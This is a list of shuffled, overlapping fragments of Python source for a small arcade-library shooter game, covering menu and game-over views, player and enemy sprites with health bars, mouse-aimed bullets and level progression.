"the 'menu' view. \"\"\" def on_show(self): \"\"\" Called when switching to this view\"\"\"",
"width=health_width, height=HEALTHBAR_HEIGHT, color=arcade.color.GREEN) class MenuView(arcade.View): \"\"\" Class that manages the 'menu' view. \"\"\"",
"color=arcade.color.WHITE) def enemy_draw_health_bar(self): # Draw the health bar # Draw the red background",
"enemy.remove_from_sprite_lists() arcade.play_sound(self.death_sound) else: # Not dead arcade.play_sound(self.hit_sound) # If the bullet flies off-screen,",
"game_view.setup() self.window.show_view(game_view) arcade.run() class GameOverView(arcade.View): \"\"\" Class to manage the game over view",
"self.level = self.updated_level + 1 else: self.good = False else: for i in",
"+= self.change_angle def follow_sprite(self, player_sprite): # This tells the enemies to go to",
"Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT) enemy2.center_x = random.randrange(SCREEN_WIDTH)",
"HEALTH_NUMBER_OFFSET_Y, font_size=12, color=arcade.color.WHITE) def enemy_draw_health_bar(self): # Draw the health bar # Draw the",
"arcade import math import os from arcade.color import BLACK, WHITE SPRITE_SCALING_PLAYER = .60",
"player_draw_health_bar(self): # Draw the health bar # Draw the red background start_x =",
"= arcade.load_sound(\"shooting_game/assets/sounds/death.wav\") self.gameOver_sound = arcade.load_sound(\"shooting_game/assets/sounds/gameOver.wav\") self.left_pressed = False self.right_pressed = False self.up_pressed =",
"= 0 self.player_sprite.change_y = 0 if self.up_pressed and not self.down_pressed: self.player_sprite.change_y = MOVEMENT_SPEED",
"enemy3.center_x = random.randrange(SCREEN_WIDTH) enemy3.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the enemy to the",
"\"\"\" def __init__(self): \"\"\" Initializer \"\"\" # Call the parent class initializer #super().__init__(SCREEN_WIDTH,",
"= False self.width = SCREEN_WIDTH # Background image will be stored in this",
"SPRITE_SCALING_ENEMY, self.enemy_health) enemy2 = ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2) # Position the enemy enemy.center_x =",
"\"\"\" Class to manage the game over view \"\"\" def on_show(self): \"\"\" Called",
"screen self.center_x += self.change_x self.center_y += self.change_y # Check for out-of-bounds if self.left",
"start_y = 35 if self.player_cur_health < self.player_max_health: arcade.draw_rectangle_filled(start_x + HEALTH_NUMBER_OFFSET_X, start_y + HEALTHBAR_OFFSET_Y,",
"enemy.center_y = random.randrange(120, SCREEN_HEIGHT) enemy2.center_x = random.randrange(SCREEN_WIDTH) enemy2.center_y = random.randrange(120, SCREEN_HEIGHT) # Add",
"WHITE SPRITE_SCALING_PLAYER = .60 SPRITE_SCALING_ENEMY = 0.5 SPRITE_SCALING_ENEMY_2 = 0.15 SPRITE_SCALING_ENEMY_3 = 0.3",
"= (HEALTHBAR_WIDTH +50) * (self.player_cur_health / self.player_max_health) arcade.draw_rectangle_filled(start_x - 0.5 * (HEALTHBAR_WIDTH -",
"== arcade.key.ESCAPE: menu_view = MenuView() self.window.show_view(menu_view) class MyGame(arcade.View): \"\"\" Main application class. \"\"\"",
"MenuView(arcade.View): \"\"\" Class that manages the 'menu' view. \"\"\" def on_show(self): \"\"\" Called",
"= ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2) # Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y =",
"(self.enemy_cur_health / self.enemy_max_health) arcade.draw_rectangle_filled(center_x=self.center_x - 0.5 * (HEALTHBAR_WIDTH - health_width), center_y=self.center_y - 10,",
"+ HEALTH_NUMBER_OFFSET_X, start_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH + 60, height=HEALTHBAR_HEIGHT + 10, color=arcade.color.RED) #",
"0: bullet.remove_from_sprite_lists() # For every enemy we hit, process for enemy in hit_list:",
"color=arcade.color.RED) # Calculate width based on health start_x = 85 start_y = 25",
"SCREEN_HEIGHT - 1 class ENEMY(arcade.Sprite): def update(self): # Rotate the coin. # The",
"the health bar # Draw the red background if self.enemy_cur_health < self.enemy_max_health: arcade.draw_rectangle_filled(center_x=self.center_x,",
"240 arcade.draw_text(\"Use your mouse to aim\", start_x, start_y, arcade.color.RED, 15) start_x = 360",
"MOVEMENT_SPEED self.player_list.update() for enemy in self.enemy_list: enemy.follow_sprite(self.player_sprite) for enemy2 in self.enemy_list: enemy2.follow_sprite(self.player_sprite) for",
"f\"{self.player_cur_health}/{self.player_max_health}\" start_x = 25 start_y = 40 arcade.draw_text(health_string, start_x + HEALTH_NUMBER_OFFSET_X, start_y +",
"dead arcade.play_sound(self.hit_sound) # If the bullet flies off-screen, remove it. if bullet.bottom >",
"self.gameOver_sound = arcade.load_sound(\"shooting_game/assets/sounds/gameOver.wav\") self.left_pressed = False self.right_pressed = False self.up_pressed = False self.down_pressed",
"0 self.player_sprite.change_y = 0 if self.up_pressed and not self.down_pressed: self.player_sprite.change_y = MOVEMENT_SPEED elif",
"angle, calculate our change_x # and change_y. Velocity is how fast the bullet",
"enemy to the lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2) self.enemy_list.append(enemy3) if self.enemy_list == 0: self.window.level =",
"arcade.play_sound(self.gun_sound) # Create a bullet bullet = arcade.Sprite(\":resources:images/space_shooter/meteorGrey_small1.png\", SPRITE_SCALING_BULLET) # Position the bullet",
">= 0 and self.window.level <= 3: for i in range(self.amount_of_enemies): # Create the",
"enemy hit_list = arcade.check_for_collision_with_list(bullet, self.enemy_list) # If it did, get rid of the",
"screen if self.bottom < 0: self.bottom = 0 elif self.top > SCREEN_HEIGHT -",
"__init__(self, image, scale, enemy_max_health): super().__init__(image, scale) # Add extra attributes for health self.enemy_max_health",
"\"\"\" Main application class. \"\"\" def __init__(self): \"\"\" Initializer \"\"\" # Call the",
"1 # Check health if enemy.enemy_cur_health <= 0: # enemy dead enemy.remove_from_sprite_lists() arcade.play_sound(self.death_sound)",
"extra attributes for health self.enemy_max_health = enemy_max_health self.enemy_cur_health = enemy_max_health def enemy_draw_health_number(self): #",
"sprite rotation. Change this, and the sprite rotates. self.angle += self.change_angle def follow_sprite(self,",
"bullet.top < 0 or bullet.right < 0 or bullet.left > self.width: bullet.remove_from_sprite_lists() def",
"ENEMY): raise TypeError(\"List contents must be all ints\") # Remove one health point",
"for enemy in self.enemy_list: enemy.enemy_draw_health_number() enemy.enemy_draw_health_bar() def on_mouse_press(self, x, y, button, modifiers): #",
"= PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10) self.player_sprite.center_x = 400 self.player_sprite.center_y = 300 self.player_list.append(self.player_sprite) self.levels() #",
"health point player.player_cur_health -= 1 # Check health if player.player_cur_health <= 0: arcade.play_sound(self.gameOver_sound)",
"# Remove one health point enemy.enemy_cur_health -= 1 # Check health if enemy.enemy_cur_health",
"TypeError(\"List contents must be all ints\") # Remove one health point enemy.enemy_cur_health -=",
"player.player_cur_health <= 0: arcade.play_sound(self.gameOver_sound) game_over = GameOverView() self.window.show_view(game_over) arcade.run() # enemy dead player.remove_from_sprite_lists()",
"# Get from the mouse the destination location for the bullet dest_x =",
"from the mouse the destination location for the bullet dest_x = x dest_y",
"= player_max_health self.player_cur_health = player_max_health def player_draw_health_number(self): # Draw how many health the",
"self.enemy_health3) # Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT) enemy2.center_x",
"start_y = 270 arcade.draw_text(f\"You died in level: {self.window.level}\", start_x, start_y, arcade.color.RED, 20) arcade.draw_text(\"Click",
"dest_x = x dest_y = y # Do math to calculate how to",
"6: for i in range(self.amount_of_enemies): # Create the enemy image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\",",
"class. \"\"\" def __init__(self): \"\"\" Initializer \"\"\" # Call the parent class initializer",
"-= 1 # Check health if player.player_cur_health <= 0: arcade.play_sound(self.gameOver_sound) game_over = GameOverView()",
"self.right_pressed = False self.up_pressed = False self.down_pressed = False self.width = SCREEN_WIDTH #",
"x_diff = dest_x - start_x y_diff = dest_y - start_y angle = math.atan2(y_diff,",
"self.center_x > player_sprite.center_x: self.center_x -= min(SPRITE_SPEED, self.center_x - player_sprite.center_x) def __init__(self, image, scale,",
"the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT) enemy2.center_x = random.randrange(SCREEN_WIDTH) enemy2.center_y",
"to the destination. x_diff = dest_x - start_x y_diff = dest_y - start_y",
"whenever the mouse button is clicked arcade.play_sound(self.gun_sound) # Create a bullet bullet =",
"change_x # and change_y. Velocity is how fast the bullet travels. bullet.change_x =",
"self.player_cur_health = player_max_health def player_draw_health_number(self): # Draw how many health the enemies have",
"self.left_pressed = False elif key == arcade.key.RIGHT: self.right_pressed = False def on_draw(self): #",
"# Create a bullet bullet = arcade.Sprite(\":resources:images/space_shooter/meteorGrey_small1.png\", SPRITE_SCALING_BULLET) # Position the bullet at",
"start_x = 310 start_y = 240 arcade.draw_text(\"Use your mouse to aim\", start_x, start_y,",
"self.death_sound = arcade.load_sound(\"shooting_game/assets/sounds/deathenemy.wav\") self.playerDeath_sound = arcade.load_sound(\"shooting_game/assets/sounds/death.wav\") self.gameOver_sound = arcade.load_sound(\"shooting_game/assets/sounds/gameOver.wav\") self.left_pressed = False self.right_pressed",
"os from arcade.color import BLACK, WHITE SPRITE_SCALING_PLAYER = .60 SPRITE_SCALING_ENEMY = 0.5 SPRITE_SCALING_ENEMY_2",
"- start_y angle = math.atan2(y_diff, x_diff) # Taking into account the angle, calculate",
"start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, font_size=12, color=arcade.color.WHITE) def enemy_draw_health_bar(self): # Draw the health bar #",
"self.enemy_list = None self.bullet_list = None # Set up the player self.player_sprite =",
"\"\"\" if key == arcade.key.UP: self.up_pressed = False elif key == arcade.key.DOWN: self.down_pressed",
"== arcade.key.RIGHT: self.right_pressed = False def on_draw(self): # render the screen befroe start",
"10, height=HEALTHBAR_HEIGHT + 10, color=arcade.color.GREEN) def update(self): \"\"\" Move the player \"\"\" #",
"= SPRITE_SPEED # Game Sounds self.newLevel_sound = arcade.load_sound(\"shooting_game/assets/sounds/newLevel.wav\") self.gun_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.hit_sound =",
"= 600 SCREEN_TITLE = \"Shooter Game\" SPRITE_SPEED = 0.20 BULLET_SPEED = 5 HEALTHBAR_WIDTH",
"for enemy in self.enemy_list: player_hit = arcade.check_for_collision_with_list(enemy, self.player_list) if len(player_hit) > 0: enemy.remove_from_sprite_lists()",
"= dest_y - start_y angle = math.atan2(y_diff, x_diff) # Taking into account the",
"manages the 'menu' view. \"\"\" def on_show(self): \"\"\" Called when switching to this",
"def update(self): # Rotate the coin. # The arcade.Sprite class has an \"angle\"",
"mouse the destination location for the bullet dest_x = x dest_y = y",
"\"\"\" Class that manages the 'menu' view. \"\"\" def on_show(self): \"\"\" Called when",
"= 25 health_width = (HEALTHBAR_WIDTH +50) * (self.player_cur_health / self.player_max_health) arcade.draw_rectangle_filled(start_x - 0.5",
"self.enemy_cur_health < self.enemy_max_health: arcade.draw_rectangle_filled(center_x=self.center_x, center_y=self.center_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH, height=3, color=arcade.color.RED) # Calculate width",
"arcade.key.DOWN: self.down_pressed = False elif key == arcade.key.LEFT: self.left_pressed = False elif key",
"25, anchor_x=\"center\") def on_key_press(self, key, _modifiers): \"\"\" If user hits escape, go back",
"self.player_sprite.center_y bullet.center_x = start_x bullet.center_y = start_y # Get from the mouse the",
"tells the enemies to go to the main guy if self.center_y < player_sprite.center_y:",
"bullet.bottom > self.width or bullet.top < 0 or bullet.right < 0 or bullet.left",
"your keyboard to move around\", start_x, start_y, arcade.color.RED, 15) start_x = 310 start_y",
"bullet in self.bullet_list: # Check this bullet to see if it hit a",
"start_y , width=health_width + 10, height=HEALTHBAR_HEIGHT + 10, color=arcade.color.GREEN) def update(self): \"\"\" Move",
"SPRITE_SCALING_BULLET) # Position the bullet at the player's current location start_x = self.player_sprite.center_x",
"an \"angle\" attribute that controls # the sprite rotation. Change this, and the",
"Set the background color self.background = arcade.load_texture(\":resources:images/backgrounds/abstract_1.jpg\") def on_key_press(self, key, modifiers): \"\"\"Called whenever",
"enemies have health_string = f\"{self.player_cur_health}/{self.player_max_health}\" start_x = 25 start_y = 40 arcade.draw_text(health_string, start_x",
"SCREEN_HEIGHT) enemy2.center_x = random.randrange(SCREEN_WIDTH) enemy2.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the enemy to",
"+= 1 self.good = True self.levels() self.amount_of_enemies += 2 #self.enemy_health += 1 self.speed",
"self.enemy_health2) # Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT) enemy2.center_x",
"= 0 # game = MyGame() # game.setup() # arcade.run() if __name__ ==",
"self.enemy_list: player_hit = arcade.check_for_collision_with_list(enemy, self.player_list) if len(player_hit) > 0: enemy.remove_from_sprite_lists() for player in",
"anchor_x=\"center\") def on_key_press(self, key, _modifiers): \"\"\" If user hits escape, go back to",
"arcade.run() # enemy dead player.remove_from_sprite_lists() else: # Not dead arcade.play_sound(self.playerDeath_sound) # Loop through",
"self.background = arcade.load_texture(\":resources:images/backgrounds/abstract_1.jpg\") def on_key_press(self, key, modifiers): \"\"\"Called whenever a key is pressed.",
"Velocity is how fast the bullet travels. bullet.change_x = math.cos(angle) * BULLET_SPEED bullet.change_y",
"Add extra attributes for health self.enemy_max_health = enemy_max_health self.enemy_cur_health = enemy_max_health def enemy_draw_health_number(self):",
"< 0 or bullet.right < 0 or bullet.left > self.width: bullet.remove_from_sprite_lists() def main():",
"Draw the red background if self.enemy_cur_health < self.enemy_max_health: arcade.draw_rectangle_filled(center_x=self.center_x, center_y=self.center_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH,",
"menu_view = MenuView() self.window.show_view(menu_view) class MyGame(arcade.View): \"\"\" Main application class. \"\"\" def __init__(self):",
"1 self.good = True self.levels() self.amount_of_enemies += 2 #self.enemy_health += 1 self.speed +=",
"SCREEN_WIDTH - 1 # Make sure he cant go off the screen if",
"this, and the sprite rotates. self.angle += self.change_angle def follow_sprite(self, player_sprite): # This",
"self.bottom < 0: self.bottom = 0 elif self.top > SCREEN_HEIGHT - 1: self.top",
"= False elif key == arcade.key.DOWN: self.down_pressed = False elif key == arcade.key.LEFT:",
"False elif key == arcade.key.LEFT: self.left_pressed = False elif key == arcade.key.RIGHT: self.right_pressed",
"- player_sprite.center_x) def __init__(self, image, scale, enemy_max_health): super().__init__(image, scale) # Add extra attributes",
"the background color self.background = arcade.load_texture(\":resources:images/backgrounds/abstract_1.jpg\") def on_key_press(self, key, modifiers): \"\"\"Called whenever a",
"dead player.remove_from_sprite_lists() else: # Not dead arcade.play_sound(self.playerDeath_sound) # Loop through each bullet for",
"_modifiers): \"\"\" Use a mouse press to advance to the 'game' view. \"\"\"",
"random import arcade import math import os from arcade.color import BLACK, WHITE SPRITE_SCALING_PLAYER",
"location for the bullet dest_x = x dest_y = y # Do math",
"hit, process for enemy in hit_list: # Make sure this is the right",
"sprites self.bullet_list.update() if len(self.enemy_list) == 0 and self.window.level > self.updated_level: self.window.level += 1",
"self.width = SCREEN_WIDTH # Background image will be stored in this variable self.background",
"arcade.key.UP: self.up_pressed = False elif key == arcade.key.DOWN: self.down_pressed = False elif key",
"+ HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH + 60, height=HEALTHBAR_HEIGHT + 10, color=arcade.color.RED) # Calculate width based",
"main(): window = arcade.Window(SCREEN_WIDTH, SCREEN_HEIGHT, \"Shooter Game\") menu_view = MenuView() window.show_view(menu_view) arcade.run() window.level",
"\"\"\" Use a mouse press to advance to the 'game' view. \"\"\" game_view",
"image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) enemy2 = ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2) # Position",
"is pressed. \"\"\" if key == arcade.key.UP: self.up_pressed = True elif key ==",
"self.player_list: player.player_draw_health_number() player.player_draw_health_bar() for enemy in self.enemy_list: enemy.enemy_draw_health_number() enemy.enemy_draw_health_bar() def on_mouse_press(self, x, y,",
"= 1 self.updated_level = -1 self.amount_of_enemies = 5 self.speed = SPRITE_SPEED # Game",
"a enemy hit_list = arcade.check_for_collision_with_list(bullet, self.enemy_list) # If it did, get rid of",
"self.window.show_view(game_view) arcade.run() class GameOverView(arcade.View): \"\"\" Class to manage the game over view \"\"\"",
"\"\"\" If user hits escape, go back to the main menu view \"\"\"",
"1 self.speed += .20 arcade.play_sound(self.newLevel_sound) for enemy in self.enemy_list: player_hit = arcade.check_for_collision_with_list(enemy, self.player_list)",
"self.updated_level + 1 else: self.good = False else: for i in range(self.amount_of_enemies): #",
"attributes for health self.enemy_max_health = enemy_max_health self.enemy_cur_health = enemy_max_health def enemy_draw_health_number(self): # Draw",
"Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the",
"application class. \"\"\" def __init__(self): \"\"\" Initializer \"\"\" # Call the parent class",
"self.window.level = self.updated_level + 1 arcade.play_sound(self.newLevel_sound) else: self.good = False elif self.window.level >",
"= f\"{self.player_cur_health}/{self.player_max_health}\" start_x = 25 start_y = 40 arcade.draw_text(health_string, start_x + HEALTH_NUMBER_OFFSET_X, start_y",
"else: self.good = False elif self.window.level > 3 and self.window.level < 6: for",
"self.good = False else: for i in range(self.amount_of_enemies): # Create the enemy image",
"= 0.3 SPRITE_SCALING_BULLET = 0.7 ENEMY_COUNT = 15 SCREEN_WIDTH = 800 SCREEN_HEIGHT =",
"sprite rotates. self.angle += self.change_angle def follow_sprite(self, player_sprite): # This tells the enemies",
"# Draw the health bar # Draw the red background if self.enemy_cur_health <",
"manage the game over view \"\"\" def on_show(self): \"\"\" Called when switching to",
"\"\"\" Move the player \"\"\" # Move player around the screen self.center_x +=",
"for out-of-bounds if self.left < 0: self.left = 0 elif self.right > SCREEN_WIDTH",
"must be all ints\") # Remove one health point player.player_cur_health -= 1 #",
"y, button, modifiers): # Called whenever the mouse button is clicked arcade.play_sound(self.gun_sound) #",
"= 210 arcade.draw_text(\"Click to Shoot\", start_x, start_y, arcade.color.RED, 15) start_x = 330 start_y",
"= ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) enemy2 = ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2) # Position the enemy",
"False self.up_pressed = False self.down_pressed = False self.width = SCREEN_WIDTH # Background image",
"-= min(SPRITE_SPEED, self.center_y - player_sprite.center_y) if self.center_x < player_sprite.center_x: self.center_x += min(SPRITE_SPEED, player_sprite.center_x",
"False def on_draw(self): # render the screen befroe start drawing arcade.start_render() arcade.draw_lrwh_rectangle_textured(0, 0,",
"arcade.draw_text(\"Use your mouse to aim\", start_x, start_y, arcade.color.RED, 15) start_x = 360 start_y",
"# Check for out-of-bounds if self.left < 0: self.left = 0 elif self.right",
".20 arcade.play_sound(self.newLevel_sound) for enemy in self.enemy_list: player_hit = arcade.check_for_collision_with_list(enemy, self.player_list) if len(player_hit) >",
"game # Sprite lists self.window.level = 1 self.player_list = arcade.SpriteList() self.enemy_list = arcade.SpriteList()",
"import os from arcade.color import BLACK, WHITE SPRITE_SCALING_PLAYER = .60 SPRITE_SCALING_ENEMY = 0.5",
"< self.player_max_health: arcade.draw_rectangle_filled(start_x + HEALTH_NUMBER_OFFSET_X, start_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH + 60, height=HEALTHBAR_HEIGHT +",
"self.enemy_health) enemy2 = ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2) enemy3 = ENEMY(\":resources:images/enemies/saw.png\", SPRITE_SCALING_ENEMY_3, self.enemy_health3) # Position",
"view. \"\"\" def on_show(self): \"\"\" Called when switching to this view\"\"\" arcade.set_background_color(arcade.color.BLACK) def",
"Get from the mouse the destination location for the bullet dest_x = x",
"min(SPRITE_SPEED, self.center_x - player_sprite.center_x) def __init__(self, image, scale, enemy_max_health): super().__init__(image, scale) # Add",
"SCREEN_HEIGHT/2.5, arcade.color.RED, 100, anchor_x=\"center\") start_x = 290 start_y = 270 arcade.draw_text(f\"You died in",
"elif key == arcade.key.DOWN: self.down_pressed = False elif key == arcade.key.LEFT: self.left_pressed =",
"+= self.change_x self.center_y += self.change_y # Check for out-of-bounds if self.left < 0:",
"< player_sprite.center_x: self.center_x += min(SPRITE_SPEED, player_sprite.center_x - self.center_x) elif self.center_x > player_sprite.center_x: self.center_x",
"the enemy image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) # Position the enemy enemy.center_x",
"this variable self.background = None def levels(self): while self.good: if self.window.level >= 0",
"Check for out-of-bounds if self.left < 0: self.left = 0 elif self.right >",
"for enemy in self.enemy_list: enemy.follow_sprite(self.player_sprite) for enemy2 in self.enemy_list: enemy2.follow_sprite(self.player_sprite) for enemy3 in",
"arcade.play_sound(self.hit_sound) # If the bullet flies off-screen, remove it. if bullet.bottom > self.width",
"For every enemy we hit, process for enemy in hit_list: # Make sure",
"lists self.window.level = 1 self.player_list = arcade.SpriteList() self.enemy_list = arcade.SpriteList() self.bullet_list = arcade.SpriteList()",
"all ints\") # Remove one health point player.player_cur_health -= 1 # Check health",
"HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH, height=3, color=arcade.color.RED) # Calculate width based on health health_width = HEALTHBAR_WIDTH",
"enemy_draw_health_number(self): # Draw how many health the enemies have health_string = f\"{self.enemy_cur_health}/{self.enemy_max_health}\" arcade.draw_text(health_string,",
"# Background image will be stored in this variable self.background = None def",
"self.good = False elif self.window.level > 3 and self.window.level < 6: for i",
"sure he cant go off the screen if self.bottom < 0: self.bottom =",
"\"\"\" Initializer \"\"\" # Call the parent class initializer #super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, SCREEN_TITLE) super().__init__()",
"health self.player_max_health = player_max_health self.player_cur_health = player_max_health def player_draw_health_number(self): # Draw how many",
"+ HEALTH_NUMBER_OFFSET_X, start_y + HEALTH_NUMBER_OFFSET_Y, arcade.color.WHITE, 12) # arcade.draw_text(health_string, # start_x=self.center_x + HEALTH_NUMBER_OFFSET_X,",
"- player_sprite.center_y) if self.center_x < player_sprite.center_x: self.center_x += min(SPRITE_SPEED, player_sprite.center_x - self.center_x) elif",
"arcade.play_sound(self.gameOver_sound) game_over = GameOverView() self.window.show_view(game_over) arcade.run() # enemy dead player.remove_from_sprite_lists() else: # Not",
"self.center_y > player_sprite.center_y: self.center_y -= min(SPRITE_SPEED, self.center_y - player_sprite.center_y) if self.center_x < player_sprite.center_x:",
"enemy.enemy_draw_health_number() enemy.enemy_draw_health_bar() def on_mouse_press(self, x, y, button, modifiers): # Called whenever the mouse",
"self.left_pressed = False self.right_pressed = False self.up_pressed = False self.down_pressed = False self.width",
"enemy dead player.remove_from_sprite_lists() else: # Not dead arcade.play_sound(self.playerDeath_sound) # Loop through each bullet",
"arcade.check_for_collision_with_list(bullet, self.enemy_list) # If it did, get rid of the bullet if len(hit_list)",
"start drawing arcade.start_render() arcade.draw_lrwh_rectangle_textured(0, 0, SCREEN_WIDTH, SCREEN_HEIGHT, self.background) # Draw all the sprites",
"False self.right_pressed = False self.up_pressed = False self.down_pressed = False self.width = SCREEN_WIDTH",
"Called when switching to this view\"\"\" arcade.set_background_color(arcade.color.BLACK) def on_draw(self): \"\"\" Draw the game",
"the enemy to the lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2) if self.enemy_list == 0: self.level =",
"(HEALTHBAR_WIDTH - health_width), center_y=self.center_y - 10, width=health_width, height=HEALTHBAR_HEIGHT, color=arcade.color.GREEN) class MenuView(arcade.View): \"\"\" Class",
"raise TypeError(\"List contents must be all ints\") # Remove one health point enemy.enemy_cur_health",
"- start_x y_diff = dest_y - start_y angle = math.atan2(y_diff, x_diff) # Taking",
"the coin. # The arcade.Sprite class has an \"angle\" attribute that controls #",
"start_y = 370 arcade.draw_text(\"Shooter Game\", start_x, start_y, arcade.color.WHITE, 50) self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER,",
"= None self.bullet_list = None # Set up the player self.player_sprite = None",
"start_x = 360 start_y = 210 arcade.draw_text(\"Click to Shoot\", start_x, start_y, arcade.color.RED, 15)",
"when the user releases a key. \"\"\" if key == arcade.key.UP: self.up_pressed =",
"Draw the health bar # Draw the red background if self.enemy_cur_health < self.enemy_max_health:",
"# Called whenever the mouse button is clicked arcade.play_sound(self.gun_sound) # Create a bullet",
"# Set the background color self.background = arcade.load_texture(\":resources:images/backgrounds/abstract_1.jpg\") def on_key_press(self, key, modifiers): \"\"\"Called",
"view. \"\"\" game_view = MyGame() game_view.setup() self.window.show_view(game_view) arcade.run() class GameOverView(arcade.View): \"\"\" Class to",
"_button, _modifiers): \"\"\" Use a mouse press to advance to the 'game' view.",
"* BULLET_SPEED bullet.change_y = math.sin(angle) * BULLET_SPEED # Add the bullet to the",
"arcade.color.WHITE, 12) # arcade.draw_text(health_string, # start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, # start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, #",
"- self.center_y) elif self.center_y > player_sprite.center_y: self.center_y -= min(SPRITE_SPEED, self.center_y - player_sprite.center_y) if",
"self.good: if self.window.level >= 0 and self.window.level <= 3: for i in range(self.amount_of_enemies):",
"self.enemy_list: enemy3.follow_sprite(self.player_sprite) # update all sprites self.bullet_list.update() if len(self.enemy_list) == 0 and self.window.level",
"start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, # start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, # font_size=12, # color=arcade.color.WHITE) def player_draw_health_bar(self):",
"that manages the 'menu' view. \"\"\" def on_show(self): \"\"\" Called when switching to",
"levels(self): while self.good: if self.window.level >= 0 and self.window.level <= 3: for i",
"start_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH + 60, height=HEALTHBAR_HEIGHT + 10, color=arcade.color.RED) # Calculate width",
"Remove one health point player.player_cur_health -= 1 # Check health if player.player_cur_health <=",
"for enemy in hit_list: # Make sure this is the right sprite if",
"= self.updated_level + 1 arcade.play_sound(self.newLevel_sound) else: self.good = False elif self.window.level > 3",
"did, get rid of the bullet if len(hit_list) > 0: bullet.remove_from_sprite_lists() # For",
"start_y = 210 arcade.draw_text(\"Click to Shoot\", start_x, start_y, arcade.color.RED, 15) start_x = 330",
"all the sprites self.enemy_list.draw() self.bullet_list.draw() self.player_list.draw() output = f\"Level: {self.window.level}\" arcade.draw_text(output, 12, 45,",
"red background if self.enemy_cur_health < self.enemy_max_health: arcade.draw_rectangle_filled(center_x=self.center_x, center_y=self.center_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH, height=3, color=arcade.color.RED)",
"the mouse the destination location for the bullet dest_x = x dest_y =",
"random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the enemy to the lists self.enemy_list.append(enemy)",
"initializer #super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, SCREEN_TITLE) super().__init__() # Variables that will hold sprite lists self.player_list",
"player's current location start_x = self.player_sprite.center_x start_y = self.player_sprite.center_y bullet.center_x = start_x bullet.center_y",
"= False else: for i in range(self.amount_of_enemies): # Create the enemy image enemy",
"Class that manages the 'menu' view. \"\"\" def on_show(self): \"\"\" Called when switching",
"self.center_x) elif self.center_x > player_sprite.center_x: self.center_x -= min(SPRITE_SPEED, self.center_x - player_sprite.center_x) def __init__(self,",
"Main application class. \"\"\" def __init__(self): \"\"\" Initializer \"\"\" # Call the parent",
"key, modifiers): \"\"\"Called whenever a key is pressed. \"\"\" if key == arcade.key.UP:",
"Initializer \"\"\" # Call the parent class initializer #super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, SCREEN_TITLE) super().__init__() #",
"self.enemy_health = 2 self.enemy_health2 = 5 self.enemy_health3 = 10 self.good = True self.window.level",
"def enemy_draw_health_bar(self): # Draw the health bar # Draw the red background if",
"center_y=123, width=200, height=50, color=WHITE) def on_mouse_press(self, _x, _y, _button, _modifiers): \"\"\" Use a",
"SCREEN_HEIGHT) # Add the enemy to the lists self.enemy_list.append(enemy) if self.enemy_list == 0:",
"health start_x = 85 start_y = 25 health_width = (HEALTHBAR_WIDTH +50) * (self.player_cur_health",
"rotation. Change this, and the sprite rotates. self.angle += self.change_angle def follow_sprite(self, player_sprite):",
"arcade.load_sound(\"shooting_game/assets/sounds/deathenemy.wav\") self.playerDeath_sound = arcade.load_sound(\"shooting_game/assets/sounds/death.wav\") self.gameOver_sound = arcade.load_sound(\"shooting_game/assets/sounds/gameOver.wav\") self.left_pressed = False self.right_pressed = False",
"= ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) # Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y =",
"and the sprite rotates. self.angle += self.change_angle def follow_sprite(self, player_sprite): # This tells",
